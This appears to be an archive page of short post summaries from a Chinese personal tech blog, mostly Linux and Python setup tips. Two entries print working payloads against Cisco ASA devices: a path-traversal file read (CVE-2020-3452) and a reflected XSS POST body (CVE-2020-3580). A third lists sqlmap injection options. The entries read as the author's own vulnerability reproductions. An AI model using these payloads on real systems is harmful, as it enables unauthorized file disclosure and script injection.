伪静态识别
摘要:F12--console中输入 alert(document.lastModified) 跟当前时间一样就是动态,因为动态网页总是实时生成的,静态则是当时页面创建的时间 (多次刷新都一样的静态!!!)
阅读全文
posted @ 2022-06-16 11:14
06 2022 档案
vim永久显示行号
摘要:vi /etc/vim/vimrc 添加set nu 保存即可 (这样可以保留代码高亮设置,不要用新增~/.vimrc的方法,会改掉其他设置)
阅读全文
posted @ 2022-06-10 02:32
Debian9升级最新Python3.10.5
摘要:wget https://www.python.org/ftp/python/3.10.5/Python-3.10.5.tgz tar zxvf Python-3.10.5.tgz ./configure --enable-optimizations make altinstall 默认安装在了/u
阅读全文
posted @ 2022-06-10 02:09
ERROR: Package 'rich' requires a different Python: 3.5.3 not in '<4.0,>=3.6'
摘要:醉了,搞了半天,原来是python3.5不支持rich库了,所以都下不了。。。。 各种换源尝试。。。。 手动下载了,本地安装也不行(最新的) 老版的1.0.1版本的也不行。。。。拉倒了,升python3.6以后吧
阅读全文
posted @ 2022-06-10 01:14
linux系统用pip2安装pip3
摘要:wget https://bootstrap.pypa.io/pip/3.5/get-pip.py python3 get-pip.py pip2和pip3共存 参考: python2.7安装pip及下载第三方模块_李郭涛的博客-CSDN博客_python2.7 模块下载 https://blog.
阅读全文
posted @ 2022-06-10 00:40
CISCO ASA设备任意文件读取漏洞(CVE-2020-3452)
摘要:还是刚才的设备,还有漏洞。。。 payload1是 /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 1的部分文件内容截图(这个文件名只是当前的网页
阅读全文
posted @ 2022-06-09 22:57
CISCO ASA设备的POST反射型XSS漏洞复现(CVE-2020-3580)
摘要:今天正好碰到这个系统,找了下存在这个漏洞,记录下 是这个界面的,就打开hackbar,注意url后面部分和post部分 URL部分 /+CSCOE+/saml/sp/acs?tgname=a POST部分 SAMLResponse="><svg/onload=alert('XSSS')> 执行后就会
阅读全文
posted @ 2022-06-09 22:16
sqlmap指定参数和指定技术扫描
摘要:-p cid --technique=TECH 指定所使用的技术(B:布尔盲注;E:报错注入;U:联合查询注入;S:文件系统,操作系统,注册表相关注入;T:时间盲注; 默认全部使用) --time-sec=TIMESEC 在基于时间的盲注的时候,指定判断的时间,单位秒,默认5秒。 --delay=D
阅读全文
posted @ 2022-06-08 16:46
联系ThinkBook笔记本预装windows11家庭中文版系统跳过微软登录验证
摘要:登录界面按CTRL+Shift+F3(Fn)后重启直接进入administrator,弹窗不要确认
阅读全文
posted @ 2022-06-02 11:17
